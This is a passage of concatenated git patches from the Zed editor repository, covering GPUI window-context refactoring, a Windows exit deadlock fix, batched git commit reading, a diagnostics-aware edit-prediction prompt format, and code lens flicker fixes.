self.cx, |_, _, cx| cx.new(build_entity)) + .expect("window was unexpectedly closed") } fn reserve_entity(&mut self) -> crate::Reservation { @@ -952,7 +957,11 @@ impl AppContext for VisualTestContext { reservation: crate::Reservation, build_entity: impl FnOnce(&mut Context) -> T, ) -> Entity { - self.cx.insert_entity(reservation, build_entity) + self.window + .update(&mut self.cx, |_, _, cx| { + cx.insert_entity(reservation, build_entity) + }) + .expect("window was unexpectedly closed") } fn update_entity( @@ -987,6 +996,14 @@ impl AppContext for VisualTestContext { self.cx.update_window(window, f) } + fn with_window( + &mut self, + entity_id: EntityId, + f: impl FnOnce(&mut Window, &mut App) -> R, + ) -> Option { + self.cx.with_window(entity_id, f) + } + fn read_window( &self, window: &WindowHandle, @@ -1037,11 +1054,14 @@ impl VisualContext for VisualTestContext { view: &Entity, update: impl FnOnce(&mut V, &mut Window, &mut Context) -> R, ) -> R { - self.window - .update(&mut self.cx, |_, window, cx| { - view.update(cx, |v, cx| update(v, window, cx)) + let view = view.clone(); + self.cx + .app + .borrow_mut() + .with_window(view.entity_id(), |window, app| { + view.update(app, |v, cx| update(v, window, cx)) }) - .expect("window was unexpectedly closed") + .expect("entity has no current window; use `update` instead of `update_in`") } fn replace_root_view( diff --git a/crates/gpui/src/app/visual_test_context.rs b/crates/gpui/src/app/visual_test_context.rs index f0fbf47f1f8200..b54802a299b83b 100644 --- a/crates/gpui/src/app/visual_test_context.rs +++ b/crates/gpui/src/app/visual_test_context.rs @@ -1,9 +1,9 @@ use crate::{ Action, AnyView, AnyWindowHandle, App, AppCell, AppContext, AssetSource, BackgroundExecutor, - Bounds, ClipboardItem, Context, Entity, ForegroundExecutor, Global, InputEvent, Keystroke, - Modifiers, MouseButton, MouseDownEvent, MouseMoveEvent, MouseUpEvent, Pixels, Platform, Point, - Render, Result, Size, Task, TestDispatcher, TextSystem, VisualTestPlatform, Window, - WindowBounds, WindowHandle, WindowOptions, app::GpuiMode, + Bounds, ClipboardItem, Context, Entity, EntityId, ForegroundExecutor, Global, InputEvent, + Keystroke, Modifiers, MouseButton, MouseDownEvent, MouseMoveEvent, MouseUpEvent, Pixels, + Platform, Point, Render, Result, Size, Task, TestDispatcher, TextSystem, VisualTestPlatform, + Window, WindowBounds, WindowHandle, WindowOptions, app::GpuiMode, }; use anyhow::anyhow; use image::RgbaImage; @@ -446,6 +446,15 @@ impl AppContext for VisualTestAppContext { lock.update_window(window, f) } + fn with_window( + &mut self, + entity_id: EntityId, + f: impl FnOnce(&mut Window, &mut App) -> R, + ) -> Option { + let mut lock = self.app.borrow_mut(); + lock.with_window(entity_id, f) + } + fn read_window( &self, window: &WindowHandle, diff --git a/crates/gpui/src/gpui.rs b/crates/gpui/src/gpui.rs index 9f307f56b8fadc..5f1e9a95bcb757 100644 --- a/crates/gpui/src/gpui.rs +++ b/crates/gpui/src/gpui.rs @@ -171,6 +171,16 @@ pub trait AppContext { where F: FnOnce(AnyView, &mut Window, &mut App) -> T; + /// Run `f` against the entity's *current* window — the most recently + /// rendered window that referenced the entity. Returns `None` if the + /// entity has no current window or that window is unavailable. See + /// [`App::with_window`] for the underlying lookup. + fn with_window( + &mut self, + entity_id: EntityId, + f: impl FnOnce(&mut Window, &mut App) -> R, + ) -> Option; + /// Read a window off of the application context. fn read_window( &self, diff --git a/crates/gpui_macros/src/derive_app_context.rs b/crates/gpui_macros/src/derive_app_context.rs index 46f9e584098957..451731479c20ac 100644 --- a/crates/gpui_macros/src/derive_app_context.rs +++ b/crates/gpui_macros/src/derive_app_context.rs @@ -79,6 +79,15 @@ pub fn derive_app_context(input: TokenStream) -> TokenStream { self.#app_variable.update_window(window, f) } + fn with_window( + &mut self, + entity_id: gpui::EntityId, + f: impl FnOnce(&mut gpui::Window, &mut gpui::App) -> R, + ) -> Option + { + self.#app_variable.with_window(entity_id, f) + } + fn read_window( &self, window: &gpui::WindowHandle, diff --git a/crates/sidebar/src/sidebar_tests.rs b/crates/sidebar/src/sidebar_tests.rs index 9224edc3bed876..b2f9e6ac1ae442 100644 --- a/crates/sidebar/src/sidebar_tests.rs +++ b/crates/sidebar/src/sidebar_tests.rs @@ -10981,7 +10981,7 @@ async fn test_remote_archive_thread_with_disconnected_remote( // Disconnect the remote connection before archiving. We don't // `run_until_parked` here because the disconnect itself triggers // reconnection work that can't complete in the test environment. - remote_client.update_in(cx, |client, _window, cx| { + remote_client.update(cx, |client, cx| { client.simulate_disconnect(cx).detach(); }); From 2a4a5d6217cd5ee1587512e2d2cade4c613158ab Mon Sep 17 00:00:00 2001 From: John Tur Date: Tue, 28 Apr 2026 10:19:03 +0200 Subject: [PATCH 069/231] Fix process teardown deadlock on Windows (#55065) AWS-LC registers an `atexit` handler that intentionally acquires a lock without releasing it. AWS-LC also has `thread_local` objects which acquire this lock in their destructor. Destructors for `thread_local`s run under the loader lock. So, there is a race condition where, if a thread exits after `atexit` handlers have run, the TLS destructors will block indefinitely on this lock while holding the loader lock. Since `ExitProcess` also requires the loader lock, process teardown will deadlock. Closes #54856 Release Notes: - Fixed an issue where the Zed process wouldn't exit after closing all windows --- crates/gpui_windows/src/platform.rs | 11 +++++++++++ 1 file changed, 11 insertions(+) diff --git a/crates/gpui_windows/src/platform.rs b/crates/gpui_windows/src/platform.rs index 7e9f1e77487b41..4c2898256212a7 100644 --- a/crates/gpui_windows/src/platform.rs +++ b/crates/gpui_windows/src/platform.rs @@ -410,6 +410,17 @@ impl Platform for WindowsPlatform { self.inner .with_callback(|callbacks| &callbacks.quit, |callback| callback()); + + // Bypass the CRT exit logic, which runs atexit handlers before calling ExitProcess. + // aws-lc registers an atexit handler that intentionally acquires a lock without releasing it. + // aws-lc also has thread_local objects which acquire this lock in their destructor. + // Destructors for thread_locals run under the loader lock, so there is a race condition + // where, if a thread exits after atexit handlers have run, the TLS destructors will block + // indefinitely on this lock while holding the loader lock. Since ExitProcess also requires + // the loader lock, process teardown will deadlock. + unsafe { + windows::Win32::System::Threading::ExitProcess(0); + } } fn quit(&self) { From 689f198daececd922e8ad9b75ad539d5019129cc Mon Sep 17 00:00:00 2001 From: feeiyu <158308373+feeiyu@users.noreply.github.com> Date: Tue, 28 Apr 2026 16:29:21 +0800 Subject: [PATCH 070/231] git_graph: Align CommitDataReader with batched commit processing (#54600) Self-Review Checklist: - [X] I've reviewed my own diff for quality, security, and reliability - [ ] Unsafe blocks (if any) have justifying comments - [ ] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [X] Performance impact has been considered and is acceptable Updated `CommitDataReader::read` from single SHA to batched input/output. `run_commit_data_reader` is designed to process requests in batches, but `CommitDataReader::read` previously only sent one SHA per call. So in practice, commit data was effectively processed one-by-one from the caller path. The temporary debug logs show that batching was not performed previously. before: image after: image Release Notes: - N/A --------- Co-authored-by: Anthony Eid <56899983+Anthony-Eid@users.noreply.github.com> Co-authored-by: Anthony Eid --- crates/project/src/git_store.rs | 47 +++++++++++++++++++++++++++------ 1 file changed, 39 insertions(+), 8 deletions(-) diff --git a/crates/project/src/git_store.rs b/crates/project/src/git_store.rs index a6d963bd111beb..31ad970d6ead84 100644 --- a/crates/project/src/git_store.rs +++ b/crates/project/src/git_store.rs @@ -5236,6 +5236,16 @@ impl Repository { result_tx: smol::channel::Sender<(Oid, CommitData)>, background_executor: BackgroundExecutor, ) { + async fn receive_commit_data_request( + request_rx: &smol::channel::Receiver, + ) -> Option { + if request_rx.is_closed() && request_rx.is_empty() { + future::pending().await + } else { + request_rx.recv().await.ok() + } + } + let reader = match backend.commit_data_reader() { Ok(reader) => reader, Err(error) => { @@ -5244,19 +5254,38 @@ impl Repository { } }; + let read_commit_data = |sha| reader.read(sha).map(move |result| (sha, result)); + let mut read_futures = FuturesUnordered::new(); + loop { - let timeout = background_executor.timer(std::time::Duration::from_secs(10)); + if read_futures.is_empty() { + let timeout = background_executor.timer(Duration::from_secs(10)); - futures::select_biased! { - sha = futures::FutureExt::fuse(request_rx.recv()) => { - let Ok(sha) = sha else { + futures::select_biased! { + sha = futures::FutureExt::fuse(receive_commit_data_request(&request_rx)) => { + if let Some(sha) = sha { + read_futures.push(read_commit_data(sha)); + } + } + _ = futures::FutureExt::fuse(timeout) => { break; + } + } + } + + let next_read = read_futures.next().fuse(); + futures::pin_mut!(next_read); + + futures::select_biased! { + result = next_read => { + let Some((sha, result)) = result else { + continue; }; - match reader.read(sha).await { + match result { Ok(commit_data) => { if result_tx.send((sha, commit_data)).await.is_err() { - break; + return; } } Err(error) => { @@ -5264,8 +5293,10 @@ impl Repository { } } } - _ = futures::FutureExt::fuse(timeout) => { - break; + sha = futures::FutureExt::fuse(receive_commit_data_request(&request_rx)) => { + if let Some(sha) = sha { + read_futures.push(read_commit_data(sha)); + } } } } From 6daee16e71b61876d7c6fcd1184fd2a0ea989b0f Mon Sep 17 00:00:00 2001 From: Ben Kunkle Date: Tue, 28 Apr 2026 04:53:00 -0500 Subject: [PATCH 071/231] ep: Add diagnostics teacher format (#54999) Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes #ISSUE Release Notes: - N/A or Added/Fixed/Improved ... --- .../edit_prediction_cli/src/format_prompt.rs | 51 ++++++++- .../src/prompts/teacher.md | 1 + crates/zeta_prompt/src/zeta_prompt.rs | 106 ++++++++++++++++-- 3 files changed, 146 insertions(+), 12 deletions(-) diff --git a/crates/edit_prediction_cli/src/format_prompt.rs b/crates/edit_prediction_cli/src/format_prompt.rs index 91f6aebe0faf5a..64ca0585fab910 100644 --- a/crates/edit_prediction_cli/src/format_prompt.rs +++ b/crates/edit_prediction_cli/src/format_prompt.rs @@ -47,7 +47,14 @@ pub async fn run_format_prompt( let (editable_range, context_range) = resolved_excerpt_ranges_for_format(prompt_inputs, zeta_format); - let prompt = TeacherPrompt::format_prompt(example, editable_range, context_range); + let include_diagnostics = matches!(zeta_format, ZetaFormat::V0420Diagnostics); + + let prompt = TeacherPrompt::format_prompt( + example, + editable_range, + context_range, + include_diagnostics, + ); example.prompt = Some(ExamplePrompt { input: prompt, expected_output: None, @@ -64,8 +71,14 @@ pub async fn run_format_prompt( let (editable_range, context_range) = resolved_excerpt_ranges_for_format(prompt_inputs, zeta_format); - let prompt = - TeacherMultiRegionPrompt::format_prompt(example, editable_range, context_range); + let include_diagnostics = matches!(zeta_format, ZetaFormat::V0420Diagnostics); + + let prompt = TeacherMultiRegionPrompt::format_prompt( + example, + editable_range, + context_range, + include_diagnostics, + ); example.prompt = Some(ExamplePrompt { input: prompt, expected_output: None, @@ -128,15 +141,20 @@ impl TeacherPrompt { example: &Example, editable_range: Range, context_range: Range, + include_diagnostics: bool, ) -> String { let edit_history = Self::format_edit_history(&example.spec.edit_history); let context = Self::format_context(example); let cursor_excerpt = Self::format_cursor_excerpt(example, editable_range, context_range); + let diagnostics = include_diagnostics + .then(|| Self::format_diagnostics(example)) + .map(|diagnostics| format!("# 4. Diagnostics\n\n{diagnostics}")); let prompt_template = crate::prompt_assets::get_prompt("teacher.md"); let prompt = prompt_template .replace("{{context}}", &context) .replace("{{edit_history}}", &edit_history) + .replace("{{diagnostics}}", diagnostics.as_deref().unwrap_or("")) .replace("{{cursor_excerpt}}", &cursor_excerpt); prompt @@ -294,6 +312,27 @@ impl TeacherPrompt { let region = &text[start..end]; Ok(region.strip_suffix('\n').unwrap_or(region).to_string()) } + + fn format_diagnostics(example: &Example) -> String { + example + .prompt_inputs + .as_ref() + .map(|prompt_inputs| { + prompt_inputs + .active_buffer_diagnostics + .iter() + .map(|diagnostic| { + format!( + "*{}*:\n```\n{}\n```\n", + &diagnostic.message, &diagnostic.snippet + ) + }) + .collect::>() + .join("\n") + }) + .filter(|m| !m.is_empty()) + .unwrap_or("No Diagnostics".to_string()) + } } pub struct TeacherMultiRegionPrompt; @@ -309,15 +348,20 @@ impl TeacherMultiRegionPrompt { example: &Example, editable_range: Range, context_range: Range, + include_diagnostics: bool, ) -> String { let edit_history = Self::format_edit_history(&example.spec.edit_history); let context = Self::format_context(example); let cursor_excerpt = Self::format_cursor_excerpt(example, editable_range, context_range); + let diagnostics = include_diagnostics + .then(|| TeacherPrompt::format_diagnostics(example)) + .map(|diagnostics| format!("# 4. Diagnostics\n\n{diagnostics}")); let prompt_template = crate::prompt_assets::get_prompt("teacher_multi_region.md"); let prompt = prompt_template .replace("{{context}}", &context) .replace("{{edit_history}}", &edit_history) + .replace("{{diagnostics}}", diagnostics.as_deref().unwrap_or("")) .replace("{{cursor_excerpt}}", &cursor_excerpt); prompt @@ -900,6 +944,7 @@ mod tests { }, editable_range, context_range, + false, ); assert!(prompt.contains(TeacherPrompt::EDITABLE_REGION_START)); diff --git a/crates/edit_prediction_cli/src/prompts/teacher.md b/crates/edit_prediction_cli/src/prompts/teacher.md index 524109c7a418fb..22a2514974d853 100644 --- a/crates/edit_prediction_cli/src/prompts/teacher.md +++ b/crates/edit_prediction_cli/src/prompts/teacher.md @@ -350,6 +350,7 @@ def calculate_square_perimeter(side): {{cursor_excerpt}} +{{diagnostics}} ----- diff --git a/crates/zeta_prompt/src/zeta_prompt.rs b/crates/zeta_prompt/src/zeta_prompt.rs index 37799d528b923b..12767122fc4059 100644 --- a/crates/zeta_prompt/src/zeta_prompt.rs +++ b/crates/zeta_prompt/src/zeta_prompt.rs @@ -95,6 +95,8 @@ pub enum ZetaFormat { V0318SeedMultiRegions, /// V0318-style markers over the full available current file excerpt with no related files. V0327SingleFile, + /// V0318-style prompt with buffer diagnostics + V0420Diagnostics, } impl std::fmt::Display for ZetaFormat { @@ -245,7 +247,8 @@ pub fn format_zeta_prompt(input: &ZetaPromptInput, format: ZetaFormat) -> Option | ZetaFormat::V0316SeedMultiRegions | ZetaFormat::V0317SeedMultiRegions | ZetaFormat::V0331SeedCoderModelPy - | ZetaFormat::V0318SeedMultiRegions => 4096, + | ZetaFormat::V0318SeedMultiRegions + | ZetaFormat::V0420Diagnostics => 4096, ZetaFormat::V0327SingleFile => 16384, }; @@ -278,7 +281,7 @@ pub fn special_tokens_for_format(format: ZetaFormat) -> &'static [&'static str] ]; TOKENS } - ZetaFormat::V0318SeedMultiRegions => { + ZetaFormat::V0318SeedMultiRegions | ZetaFormat::V0420Diagnostics => { static TOKENS: &[&str] = &[ seed_coder::FIM_SUFFIX, seed_coder::FIM_PREFIX, @@ -345,6 +348,7 @@ pub fn token_limits_for_format(format: ZetaFormat) -> (usize, usize) { | ZetaFormat::V0306SeedMultiRegions | ZetaFormat::V0316SeedMultiRegions | ZetaFormat::V0318SeedMultiRegions + | ZetaFormat::V0420Diagnostics | ZetaFormat::V0317SeedMultiRegions | ZetaFormat::V0327SingleFile | ZetaFormat::V0304SeedNoEdits => (350, 150), @@ -368,7 +372,9 @@ pub fn stop_tokens_for_format(format: ZetaFormat) -> &'static [&'static str] { | ZetaFormat::V0306SeedMultiRegions | ZetaFormat::V0304SeedNoEdits => &[], ZetaFormat::V0316SeedMultiRegions => &[multi_region::V0316_END_MARKER], - ZetaFormat::V0318SeedMultiRegions => &[multi_region::V0318_END_MARKER], + ZetaFormat::V0318SeedMultiRegions | ZetaFormat::V0420Diagnostics => { + &[multi_region::V0318_END_MARKER] + } ZetaFormat::V0317SeedMultiRegions => &[multi_region::V0317_END_MARKER], ZetaFormat::V0327SingleFile => &[multi_region::V0327_END_MARKER], } @@ -398,7 +404,8 @@ pub fn excerpt_ranges_for_format( | ZetaFormat::V0306SeedMultiRegions | ZetaFormat::V0316SeedMultiRegions | ZetaFormat::V0318SeedMultiRegions - | ZetaFormat::V0317SeedMultiRegions => ( + | ZetaFormat::V0317SeedMultiRegions + | ZetaFormat::V0420Diagnostics => ( ranges.editable_350.clone(), ranges.editable_350_context_150.clone(), ), @@ -497,7 +504,7 @@ pub fn write_cursor_excerpt_section_for_format( cursor_offset, )); } - ZetaFormat::V0318SeedMultiRegions => { + ZetaFormat::V0318SeedMultiRegions | ZetaFormat::V0420Diagnostics => { prompt.push_str(&build_v0318_cursor_prefix( path, context, @@ -709,7 +716,8 @@ pub fn format_prompt_with_budget_for_format( | ZetaFormat::V0306SeedMultiRegions | ZetaFormat::V0316SeedMultiRegions | ZetaFormat::V0318SeedMultiRegions - | ZetaFormat::V0317SeedMultiRegions => { + | ZetaFormat::V0317SeedMultiRegions + | ZetaFormat::V0420Diagnostics => { let mut cursor_section = String::new(); write_cursor_excerpt_section_for_format( format, @@ -720,6 +728,10 @@ pub fn format_prompt_with_budget_for_format( cursor_offset, ); + if format == ZetaFormat::V0420Diagnostics { + cursor_section.push_str(&format_active_buffer_diagnostics(input)); + } + let budget_with_margin = apply_prompt_budget_margin(max_tokens); seed_coder::assemble_fim_prompt( context, @@ -795,6 +807,26 @@ pub fn format_prompt_with_budget_for_format( return Some(prompt); } +fn format_active_buffer_diagnostics(input: &ZetaPromptInput) -> String { + let mut output = format!("{}diagnostics\n", seed_coder::FILE_MARKER); + + if input.active_buffer_diagnostics.is_empty() { + output.push_str("No Diagnostics\n"); + return output; + } + + for diagnostic in &input.active_buffer_diagnostics { + writeln!( + output, + "*{}*:\n```\n{}\n```", + diagnostic.message, diagnostic.snippet + ) + .ok(); + } + + output +} + pub fn filter_redundant_excerpts( mut related_files: Vec, cursor_path: &Path, @@ -829,6 +861,7 @@ pub fn max_edit_event_count_for_format(format: &ZetaFormat) -> usize { | ZetaFormat::V0316SeedMultiRegions | ZetaFormat::V0318SeedMultiRegions | ZetaFormat::V0317SeedMultiRegions + | ZetaFormat::V0420Diagnostics | ZetaFormat::V0327SingleFile => 6, } } @@ -854,6 +887,7 @@ pub fn get_prefill_for_format( | ZetaFormat::V0316SeedMultiRegions | ZetaFormat::V0318SeedMultiRegions | ZetaFormat::V0317SeedMultiRegions + | ZetaFormat::V0420Diagnostics | ZetaFormat::V0327SingleFile => String::new(), } } @@ -869,6 +903,7 @@ pub fn output_end_marker_for_format(format: ZetaFormat) -> Option<&'static str> | ZetaFormat::V0306SeedMultiRegions => Some(seed_coder::END_MARKER), ZetaFormat::V0316SeedMultiRegions => Some(multi_region::V0316_END_MARKER), ZetaFormat::V0318SeedMultiRegions => Some(multi_region::V0318_END_MARKER), + ZetaFormat::V0420Diagnostics => Some(multi_region::V0318_END_MARKER), ZetaFormat::V0317SeedMultiRegions => Some(multi_region::V0317_END_MARKER), ZetaFormat::V0327SingleFile => Some(multi_region::V0327_END_MARKER), @@ -914,7 +949,7 @@ pub fn encode_patch_as_output_for_format( Ok(None) } } - ZetaFormat::V0318SeedMultiRegions => { + ZetaFormat::V0318SeedMultiRegions | ZetaFormat::V0420Diagnostics => { let empty_patch = patch.lines().count() <= 3; if empty_patch { let marker_offsets = @@ -1001,7 +1036,7 @@ pub fn format_expected_output( multi_region::V0316_END_MARKER, ) } - ZetaFormat::V0318SeedMultiRegions | ZetaFormat::V0327SingleFile => { + ZetaFormat::V0318SeedMultiRegions | ZetaFormat::V0420Diagnostics => { let (new_editable, first_hunk_offset) = udiff::apply_diff_to_string_with_hunk_offset(patch, &old_editable)?; let cursor_in_new = cursor_in_new_text(cursor_offset, first_hunk_offset, &new_editable); @@ -1013,6 +1048,18 @@ pub fn format_expected_output( multi_region::V0318_END_MARKER, ) } + ZetaFormat::V0327SingleFile => { + let (new_editable, first_hunk_offset) = + udiff::apply_diff_to_string_with_hunk_offset(patch, &old_editable)?; + let cursor_in_new = cursor_in_new_text(cursor_offset, first_hunk_offset, &new_editable); + multi_region::encode_from_old_and_new_v0318( + &old_editable, + &new_editable, + cursor_in_new, + CURSOR_MARKER, + multi_region::V0327_END_MARKER, + ) + } ZetaFormat::V0317SeedMultiRegions => { let (new_editable, first_hunk_offset) = udiff::apply_diff_to_string_with_hunk_offset(patch, &old_editable)?; @@ -1162,7 +1209,7 @@ pub fn parse_zeta2_model_output( editable_range_in_context, multi_region::apply_marker_span_v0316(old_editable_region, output)?, ), - ZetaFormat::V0318SeedMultiRegions => ( + ZetaFormat::V0318SeedMultiRegions | ZetaFormat::V0420Diagnostics => ( editable_range_in_context, multi_region::apply_marker_span_v0318(old_editable_region, output)?, ), @@ -5158,6 +5205,47 @@ mod tests { ); } + #[test] + fn test_v0420_formats_diagnostics_after_cursor_file() { + let mut input = make_input( + "prefix\neditable\nsuffix", + 7..15, + 10, + vec![], + vec![make_related_file("related.rs", "fn helper() {}\n")], + ); + input.active_buffer_diagnostics = vec![ActiveBufferDiagnostic { + severity: Some(1), + message: "missing semicolon".to_string(), + snippet: "let value = 1".to_string(), + snippet_buffer_row_range: 1..2, + diagnostic_range_in_snippet: 12..13, + }]; + + let prompt = + format_prompt_with_budget_for_format(&input, ZetaFormat::V0420Diagnostics, 10000) + .expect("v0420 prompt formatting should succeed"); + + assert_eq!( + prompt, + indoc! {r#" + <[fim-suffix]> + suffix + <[fim-prefix]>related.rs + fn helper() {} + + test.rs + prefix + <|marker_1|>edi<|user_cursor|>table<|marker_2|> + diagnostics + *missing semicolon*: + ``` + let value = 1 + ``` + <[fim-middle]>"#} + ); + } + #[test] fn test_v0317_formats_prompt_with_many_related_files() { let related_files = (0..900) From a3bb908192b88d55b3d95c0130f62b1b6af20dba Mon Sep 17 00:00:00 2001 From: Kirill Bulatov Date: Tue, 28 Apr 2026 11:59:39 +0200 Subject: [PATCH 072/231] Avoid flickering when displaying code lens (#55075) Follow-up to https://github.com/zed-industries/zed/pull/54100 Closes https://github.com/zed-industries/zed/issues/55046 Before: https://github.com/user-attachments/assets/d4730342-3526-48a8-8050-b398725a2cb9 After: https://github.com/user-attachments/assets/5493a0a1-3a8e-4215-a10c-8cd9bb04141d Release Notes: - Fixed code lens flickering when typing --- crates/editor/src/code_lens.rs | 794 ++++++++++++++++++++++----------- 1 file changed, 528 insertions(+), 266 deletions(-) diff --git a/crates/editor/src/code_lens.rs b/crates/editor/src/code_lens.rs index e93757cb3a0918..c123eceea3d125 100644 --- a/crates/editor/src/code_lens.rs +++ b/crates/editor/src/code_lens.rs @@ -14,7 +14,7 @@ use ui::{Context, Window, div, prelude::*}; use crate::{ Editor, LSP_REQUEST_DEBOUNCE_TIMEOUT, SelectionEffects, actions::ToggleCodeLens, - display_map::{BlockPlacement, BlockProperties, BlockStyle, CustomBlockId}, + display_map::{BlockPlacement, BlockProperties, BlockStyle, CustomBlockId, RenderBlock}, hover_links::HoverLink, }; @@ -31,147 +31,28 @@ struct CodeLensItem { action: CodeAction, } +pub(super) struct CodeLensBlock { + block_id: CustomBlockId, + anchor: Anchor, + line: CodeLensLine, +} + pub(super) struct CodeLensState { - pub(super) block_ids: HashMap>, + pub(super) blocks: HashMap>, + actions: HashMap>, resolve_task: Task<()>, } impl Default for CodeLensState { fn default() -> Self { Self { - block_ids: HashMap::default(), + blocks: HashMap::default(), + actions: HashMap::default(), resolve_task: Task::ready(()), } } } -impl CodeLensState { - fn all_block_ids(&self) -> HashSet { - self.block_ids.values().flatten().copied().collect() - } -} - -fn group_lenses_by_row( - lenses: Vec<(Anchor, CodeLensItem)>, - snapshot: &MultiBufferSnapshot, -) -> impl Iterator { - lenses - .into_iter() - .into_group_map_by(|(position, _)| { - let row = position.to_point(snapshot).row; - MultiBufferRow(row) - }) - .into_iter() - .sorted_by_key(|(row, _)| *row) - .filter_map(|(row, entries)| { - let position = entries.first()?.0; - let items = entries.into_iter().map(|(_, item)| item).collect(); - let indent_column = snapshot.indent_size_for_line(row).len; - Some(CodeLensLine { - position, - indent_column, - items, - }) - }) -} - -fn render_code_lens_line( - lens: CodeLensLine, - editor: WeakEntity, -) -> impl Fn(&mut crate::display_map::BlockContext) -> gpui::AnyElement { - move |cx| { - let mut children = Vec::with_capacity((2 * lens.items.len()).saturating_sub(1)); - let text_style = &cx.editor_style.text; - let font = text_style.font(); - let font_size = text_style.font_size.to_pixels(cx.window.rem_size()) * 0.9; - - for (i, item) in lens.items.iter().enumerate() { - if i > 0 { - children.push( - div() - .font(font.clone()) - .text_size(font_size) - .text_color(cx.app.theme().colors().text_muted) - .child(" | ") - .into_any_element(), - ); - } - - let title = item.title.clone(); - let action = item.action.clone(); - let editor_handle = editor.clone(); - let position = lens.position; - - children.push( - div() - .id(ElementId::from(i)) - .font(font.clone()) - .text_size(font_size) - .text_color(cx.app.theme().colors().text_muted) - .cursor_pointer() - .hover(|style| style.text_color(cx.app.theme().colors().text)) - .child(title.clone()) - .on_mouse_down(MouseButton::Left, |_, _, cx| { - cx.stop_propagation(); - }) - .on_mouse_down(MouseButton::Right, |_, _, cx| { - cx.stop_propagation(); - }) - .on_click({ - move |_event, window, cx| { - if let Some(editor) = editor_handle.upgrade() { - editor.update(cx, |editor, cx| { - editor.change_selections( - SelectionEffects::default(), - window, - cx, - |s| { - s.select_anchor_ranges([position..position]); - }, - ); - - let action = action.clone(); - if let Some(workspace) = editor.workspace() { - if try_handle_client_command( - &action, editor, &workspace, window, cx, - ) { - return; - } - - let project = workspace.read(cx).project().clone(); - if let Some(buffer) = editor - .buffer() - .read(cx) - .buffer(action.range.start.buffer_id) - { - project - .update(cx, |project, cx| { - project - .apply_code_action(buffer, action, true, cx) - }) - .detach_and_log_err(cx); - } - } - }); - } - } - }) - .into_any_element(), - ); - } - - div() - .id(cx.block_id) - .pl(cx.margins.gutter.full_width() + cx.em_width * (lens.indent_column as f32 + 0.5)) - .h_full() - .flex() - .flex_row() - .items_end() - .children(children) - .into_any_element() - } -} - pub(super) fn try_handle_client_command( action: &CodeAction, editor: &mut Editor, @@ -345,94 +226,169 @@ impl Editor { return; } - let Ok(multi_buffer_snapshot) = - editor.update(cx, |editor, cx| editor.buffer().read(cx).snapshot(cx)) - else { - return; - }; - - let mut new_lenses_per_buffer = HashMap::default(); - for (buffer_id, result) in results { - let actions = match result { - Ok(Some(actions)) => actions, - Ok(None) => continue, - Err(e) => { - log::error!("Failed to fetch code lenses for buffer {buffer_id:?}: {e:#}"); - continue; - } - }; - let individual_lenses = actions - .into_iter() - .filter_map(|action| { - let title = match &action.lsp_action { - project::LspAction::CodeLens(lens) => lens - .command - .as_ref() - .map(|cmd| SharedString::from(&cmd.title)), - _ => None, - }?; - let position = - multi_buffer_snapshot.anchor_in_excerpt(action.range.start)?; - Some((position, CodeLensItem { title, action })) - }) - .collect(); - new_lenses_per_buffer.insert( - buffer_id, - group_lenses_by_row(individual_lenses, &multi_buffer_snapshot) - .collect::>(), - ); - } - editor .update(cx, |editor, cx| { - let code_lens = editor.code_lens.get_or_insert_with(CodeLensState::default); - let mut blocks_to_remove = HashSet::default(); - for buffer_id in new_lenses_per_buffer.keys() { - if let Some(old_ids) = code_lens.block_ids.remove(buffer_id) { - blocks_to_remove.extend(old_ids); - } - } - if !blocks_to_remove.is_empty() { - editor.remove_blocks(blocks_to_remove, None, cx); - } - - let editor_handle = cx.entity().downgrade(); - for (buffer_id, lens_lines) in new_lenses_per_buffer { - if lens_lines.is_empty() { - continue; - } - let blocks = lens_lines - .into_iter() - .map(|lens_line| { - let position = lens_line.position; - BlockProperties { - placement: BlockPlacement::Above(position), - height: Some(1), - style: BlockStyle::Flex, - render: Arc::new(render_code_lens_line( - lens_line, - editor_handle.clone(), - )), - priority: 0, - } - }) - .collect::>(); - let block_ids = editor.insert_blocks(blocks, None, cx); - editor - .code_lens - .get_or_insert_with(CodeLensState::default) - .block_ids - .entry(buffer_id) - .or_default() - .extend(block_ids); + let snapshot = editor.buffer().read(cx).snapshot(cx); + for (buffer_id, result) in results { + let actions = match result { + Ok(Some(actions)) => actions, + Ok(None) => continue, + Err(e) => { + log::error!( + "Failed to fetch code lenses for buffer {buffer_id:?}: {e:#}" + ); + continue; + } + }; + editor.apply_lens_actions_for_buffer(buffer_id, actions, &snapshot, cx); } - editor.resolve_visible_code_lenses(cx); }) .ok(); }); } + /// Reconciles the set of blocks for `buffer_id` with `actions`. For each + /// existing block at row `R`: + /// - if the new fetch has no lens at `R` → remove the block (the lens is + /// gone, e.g. the function was deleted); + /// - if the new fetch has a titled lens at `R` whose rendered text + /// differs from the block's current line → swap the renderer in place + /// via [`Editor::replace_blocks`]; + /// - if the new fetch has a titled lens at `R` with the same rendered + /// text → keep the block as-is; + /// - if the new fetch has a lens at `R` but no `command` yet (the server + /// sent a shallow response that needs a separate `resolve`) → keep the + /// block as-is. The previously rendered (resolved) content stays on + /// screen until the next viewport-driven `resolve` produces a new + /// title; only then does the comparison-and-replace happen. This is + /// what keeps the post-edit screen from flickering for shallow servers + /// like `rust-analyzer`. + /// + /// Rows present in the new fetch with a title but no existing block get + /// a fresh block inserted. + fn apply_lens_actions_for_buffer( + &mut self, + buffer_id: BufferId, + actions: Vec, + snapshot: &MultiBufferSnapshot, + cx: &mut Context, + ) { + let mut rows_with_any_lens = HashSet::default(); + let mut titled_lenses = Vec::new(); + for action in &actions { + let Some(position) = snapshot.anchor_in_excerpt(action.range.start) else { + continue; + }; + + rows_with_any_lens.insert(MultiBufferRow(position.to_point(snapshot).row)); + if let project::LspAction::CodeLens(lens) = &action.lsp_action { + if let Some(title) = lens + .command + .as_ref() + .map(|cmd| SharedString::from(&cmd.title)) + { + titled_lenses.push(( + position, + CodeLensItem { + title, + action: action.clone(), + }, + )); + } + } + } + + let mut new_lines_by_row = group_lenses_by_row(titled_lenses, snapshot) + .map(|line| (MultiBufferRow(line.position.to_point(snapshot).row), line)) + .collect::>(); + + let editor_handle = cx.entity().downgrade(); + let code_lens = self.code_lens.get_or_insert_with(CodeLensState::default); + let old_blocks = code_lens.blocks.remove(&buffer_id).unwrap_or_default(); + 